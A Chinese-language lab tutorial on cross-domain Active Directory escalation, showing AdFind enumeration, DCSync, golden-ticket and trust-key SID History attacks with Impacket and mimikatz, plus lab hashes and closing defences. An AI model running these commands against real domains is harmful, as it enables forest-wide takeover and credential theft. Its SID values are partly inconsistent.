主域:sec.local
子域:shanghai.sec.local(域内主机:Win2008R2)
子域:beijing.sec.local(域内主机:Win10)
一、查询域控
当前在shanghai.sec.local的Win2008R2内
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -sc dclist
Win2019-DC1.sec.local
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=shanghai,dc=sec,dc=local -sc dclist
shanghai-DC1.shanghai.sec.local
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -sc dclist
beijing-dc1.beijing.sec.local
C:\Users\sh_test\Desktop\AdFind>
二、查询域管理员和企业管理员
查询林根域的企业管理员
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Enterprise Admins,CN=Users,DC=
sec,DC=local" member
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Enterprise Admins,CN=Users,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=sec,DC=local
1 Objects returned
C:\Users\sh_test\Desktop\AdFind>
查询林根域的域管理员
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=sec,
DC=local" member
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Domain Admins,CN=Users,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=sec,DC=local
1 Objects returned
C:\Users\sh_test\Desktop\AdFind>
查询beijing.sec.local的域管理员
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=beij
ing,DC=sec,DC=local" member
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Domain Admins,CN=Users,DC=beijing,DC=sec,DC=local
>member: CN=bj_admin,CN=Users,DC=beijing,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=beijing,DC=sec,DC=local
1 Objects returned
C:\Users\sh_test\Desktop\AdFind>
查询shanghai.sec.local的域管理员
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b "CN=Domain Admins,CN=Users,DC=shan
ghai,DC=sec,DC=local" member
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Domain Admins,CN=Users,DC=shanghai,DC=sec,DC=local
>member: CN=sh_admin,CN=Users,DC=shanghai,DC=sec,DC=local
>member: CN=Administrator,CN=Users,DC=shanghai,DC=sec,DC=local
1 Objects returned
C:\Users\sh_test\Desktop\AdFind>
三、查询所有域用户
C:\Users\sh_test\Desktop\AdFind>net group "domain users" /domain
The request will be processed at a domain controller for domain shanghai.sec.loc
al.
Group name Domain Users
Comment All domain users
Members
-------------------------------------------------------------------------------
Administrator krbtgt SEC$
sh_admin sh_test
The command completed successfully.
C:\Users\sh_test\Desktop\AdFind>
Adfind方式
sec.local下
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -f "(&(objectCateg
ory=person)(objectClass=user))" -dn
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Administrator,CN=Users,DC=sec,DC=local
dn:CN=Guest,CN=Users,DC=sec,DC=local
dn:CN=krbtgt,CN=Users,DC=sec,DC=local
dn:CN=hack,CN=Users,DC=sec,DC=local
dn:CN=test1,CN=Users,DC=sec,DC=local
dn:CN=Exchange Online-ApplicationAccount,CN=Users,DC=sec,DC=local
.............
28 Objects returned
C:\Users\sh_test\Desktop\AdFind>
beijing.sec.local下
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -f "(&(
objectCategory=person)(objectClass=user))" -dn
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=Administrator,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=Guest,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=krbtgt,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=SEC$,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=bj_test,CN=Users,DC=beijing,DC=sec,DC=local
dn:CN=bj_admin,CN=Users,DC=beijing,DC=sec,DC=local
6 Objects returned
C:\Users\sh_test\Desktop\AdFind>
四、查询所有域主机
C:\Users\sh_test\Desktop\AdFind>net group "domain computers" /domain
The request will be processed at a domain controller for domain shanghai.sec.loc
al.
Group name Domain Computers
Comment All workstations and servers joined to the domain
Members
-------------------------------------------------------------------------------
WIN-LTDJEMOOIVH$
The command completed successfully.
C:\Users\sh_test\Desktop\AdFind>
sec.local下主机
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=sec,dc=local -f "objectcategory
=computer" dn
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=WIN2019-DC1,OU=Domain Controllers,DC=sec,DC=local
dn:CN=WIN2008-1,CN=Computers,DC=sec,DC=local
dn:CN=machine1,CN=Computers,DC=sec,DC=local
dn:CN=machine2,CN=Computers,DC=sec,DC=local
dn:CN=WIN10-1,CN=Computers,DC=sec,DC=local
dn:CN=EXCHANGE,CN=Computers,DC=sec,DC=local
6 Objects returned
C:\Users\sh_test\Desktop\AdFind>
beijing.sec.local下主机
C:\Users\sh_test\Desktop\AdFind>AdFind.exe -b dc=beijing,dc=sec,dc=local -f "obj
ectcategory=computer" dn
AdFind V01.62.00cpp Joe Richards (support@joeware.net) October 2023
Using server: shanghai-DC1.shanghai.sec.local:389
Directory: Windows Server 2019
dn:CN=BEIJING-DC1,OU=Domain Controllers,DC=beijing,DC=sec,DC=local
dn:CN=WIN-422PJ6KIL95,CN=Computers,DC=beijing,DC=sec,DC=local
2 Objects returned
C:\Users\sh_test\Desktop\AdFind>
五、跨域横向攻击
1、获得子域权限
假设已获得shanghai.sec.local的sh_admin权限
导出shanghai\krbtgt
(base) ┌──(root㉿Kali)-[~]
└─# secretsdump.py shanghai/sh_admin:"Az123456@sh"@10.10.4.3 -just-dc-user "shanghai\krbtgt"
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:622be976ac1f019594ef183a62f0a08b:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:db5f379620458a216d0db1293901047e5d975463553303295a989087dbc18ff5
krbtgt:aes128-cts-hmac-sha1-96:4dbdd01957f0c20b7b190f797a5d7672
krbtgt:des-cbc-md5:b523a46bbaf107ef
[*] Cleaning up...
(base) ┌──(root㉿Kali)-[~]
└─#
注:子域的管理员无权通过DCSync导出林根域或者其他子域的内容
2、黄金票据+SID History 获得林根域权限
首先获取当前域shanghai.sec.local的域SID以及林根域sec.local的Enterprise Admins的SID
# 当前域shanghai.sec.local的域SID
(base) ┌──(root㉿Kali)-[~]
└─# lookupsid.py shanghai/sh_admin:"Az123456@sh"@10.10.4.3|grep "Domain SID is"
[*] Domain SID is: S-1-5-21-706492745-1437521578-640732945
# 林根域sec.local的Enterprise Admins的SID
└─# lookupsid.py shanghai/sh_admin:"Az123456@sh"@10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.4.2
[*] StringBinding ncacn_np:10.10.4.2[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2066713137-2133816201-3751750268
519: SEC\Enterprise Admins (SidTypeGroup)
shanghai.sec.local的域SID:S-1-5-21-706492745-1437521578-640732945
林根域sec.local的Enterprise Admins的SID:S-1-5-21-2066713137-2133816201-3751750268-519
通过mimikatz执行黄金票据+SID History攻击
生成林根域的黄金票据
(base) ┌──(root㉿Kali)-[~]
└─# ticketer.py -aesKey "4dbdd01957f0c20b7b190f797a5d7672" -domain-sid S-1-5-21-706492745-1437521578-640732945 -domain shanghai.sec.local -extra-sid 'S-1-5-21-2066713137-2133816201-3751750268-512' -user-id 500 administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
/root/miniconda3/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for shanghai.sec.local/administrator
/root/miniconda3/bin/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/root/miniconda3/bin/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/root/miniconda3/bin/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/root/miniconda3/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
(base) ┌──(root㉿Kali)-[~]
└─# export KRB5CCNAME=administrator.ccache
psexec尝试
(base) ┌──(root㉿Kali)-[~]
└─# psexec.py -k -no-pass SHANGHAI-DC1.shanghai.sec.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on SHANGHAI-DC1.shanghai.sec.local.....
[*] Found writable share ADMIN$
[*] Uploading file megpbhhH.exe
[*] Opening SVCManager on SHANGHAI-DC1.shanghai.sec.local.....
[*] Creating service bLgS on SHANGHAI-DC1.shanghai.sec.local.....
[*] Starting service bLgS.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
请注意,微软在2022 年 10 月强制实施了KB5008380补丁,旧版的mimikatz(release默认是2020版本),Kali默认的Impacket是0.9.0版本都太旧了,不支持新格式的pac。必须使用aesKey,ntlm不在有效,且必须指定-user-id
3、inter-realm key+SID History获得林根域权限
在shanghai的dc中执行命令获取inter-realm key
mimikatz # lsadump::trust /patch
Current domain: SHANGHAI.SEC.LOCAL (SHANGHAI / S-1-5-21-706492745-1437521578-640732945)
Domain: SEC.LOCAL (SEC / S-1-5-21-2066713137-2133816201-3751750268)
[ In ] SHANGHAI.SEC.LOCAL -> SEC.LOCAL
* 6/1/2025 7:19:25 PM - CLEAR - 09 a5 38 a2 f7 b1 76 69 6d 26 9b ad 56 f0 bd 94 92 9c 2f 3e 43 d7 53 c5 2b 84 a5 07 8f 21 7f 5b 19 86 48 8c b5 72 29 48 53 24 8c e1 dd 38 66 0a e8 84 90 05 e6 f8 eb 50 10 7b 03 55 58 3d a4 31 4b 09 86 da 10 a5 2c 06 0f 7f a0 e0 fa ee 58 4f fe 43 16 ce 9f 04 a3 db 8b 48 45 39 c0 16 75 2c f1 b0 d8 3f ad a6 a0 3f 76 29 25 ef d2 02 22 48 a9 4d 5c 29 47 b1 55 49 8c 68 b8 17 0d 58 c1 c6 eb 68 61 7c ee fc 81 5a c1 0c 9f a1 b0 c4 49 b7 75 5d 13 13 3c 5d de 25 f2 2d 0d 93 b3 3a f3 c7 c6 4c 07 05 c0 bb 48 67 98 0f 5c 80 46 a9 f4 32 29 12 04 aa f1 a4 93 69 0e cd 67 c9 f4 44 49 3f b0 8b 03 3c 03 ea 56 7f f8 39 6b 57 a3 05 89 c8 00 75 d8 7b 02 c1 f1 94 22 4e 63 35 cd 71 cc 97 11 23 cc b8 89 4e 5f bd 6f 9f c1 60 b9 90 ab 05 ca 6c 9e 46 a5 87 d9 b7 44 c4 f6 52 2e 36 a8 7c
* aes256_hmac c8723eb8abcc5e741eef13ff4debb20e3a31a65739adf73fd37b452945e56b84
* aes128_hmac fe46f3616bfa9eac1c1acd3f495a82b2
* rc4_hmac_nt 5a5bd4682d0de698802e36cc963f9cc6
[ Out ] SEC.LOCAL -> SHANGHAI.SEC.LOCAL
* 6/1/2025 7:19:25 PM - CLEAR - 09 a5 38 a2 f7 b1 76 69 6d 26 9b ad 56 f0 bd 94 92 9c 2f 3e 43 d7 53 c5 2b 84 a5 07 8f 21 7f 5b 19 86 48 8c b5 72 29 48 53 24 8c e1 dd 38 66 0a e8 84 90 05 e6 f8 eb 50 10 7b 03 55 58 3d a4 31 4b 09 86 da 10 a5 2c 06 0f 7f a0 e0 fa ee 58 4f fe 43 16 ce 9f 04 a3 db 8b 48 45 39 c0 16 75 2c f1 b0 d8 3f ad a6 a0 3f 76 29 25 ef d2 02 22 48 a9 4d 5c 29 47 b1 55 49 8c 68 b8 17 0d 58 c1 c6 eb 68 61 7c ee fc 81 5a c1 0c 9f a1 b0 c4 49 b7 75 5d 13 13 3c 5d de 25 f2 2d 0d 93 b3 3a f3 c7 c6 4c 07 05 c0 bb 48 67 98 0f 5c 80 46 a9 f4 32 29 12 04 aa f1 a4 93 69 0e cd 67 c9 f4 44 49 3f b0 8b 03 3c 03 ea 56 7f f8 39 6b 57 a3 05 89 c8 00 75 d8 7b 02 c1 f1 94 22 4e 63 35 cd 71 cc 97 11 23 cc b8 89 4e 5f bd 6f 9f c1 60 b9 90 ab 05 ca 6c 9e 46 a5 87 d9 b7 44 c4 f6 52 2e 36 a8 7c
* aes256_hmac b04f8d79073c9d0fbd316a92f12ec5ec73b0dc4e1cb514b6fb7a5a7300cc79e5
* aes128_hmac 977748d2c64dde47348251c7d0bf2c29
* rc4_hmac_nt 5a5bd4682d0de698802e36cc963f9cc6
获得rc4_hmac_nt为5a5bd4682d0de698802e36cc963f9cc6
shanghai.sec.local的域SID为S-1-5-21-706492745-1437521578-640732945
林根域sec.local的Enterprise Admins的SID:S-1-5-21-2066713137-2133816201-3751750268-519
# 生成高权限的Referral ticket
(base) ┌──(root㉿Kali)-[~]
└─# ticketer.py -nthash "5a5bd4682d0de698802e36cc963f9cc6" -domain-sid "S-1-5-21-706492745-1437521578-640732945" -domain "shanghai.sec.local" -extra-sid "S-1-5-21-2066713137-2133816201-3751750268-519" -spn "krbtgt/sec.local" "administrator"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
/root/miniconda3/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for shanghai.sec.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/root/miniconda3/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
# 导入票据
(base) ┌──(root㉿Kali)-[~]
└─# KRB5CCNAME=administrator.ccache
# 生成cifs st票据
(base) ┌──(root㉿Kali)-[~]
└─# getST.py -dc-ip 10.10.4.2 sec.local/administrator -spn CIFS/Win2019-DC1.sec.local -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in administrator@CIFS_Win2019-DC1.sec.local@SEC.LOCAL.ccache
# 导出林根域内用户krbtgt的Hash
(base) ┌──(root㉿Kali)-[~]
└─# secretsdump.py -no-pass -k shanghai.sec.local/administrator@Win2019-DC1.sec.local -just-dc-user "sec\krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...
六、域林攻击防御
1、SID过滤
默认情况下没有开启SID过滤,开启方法:
netdom trust /d:shanghai.sec.local sec.local /quarantine:yes
2、禁用SID History
netdom trust /d:shanghai.sec.local sec.local /EnableSIDHistory:no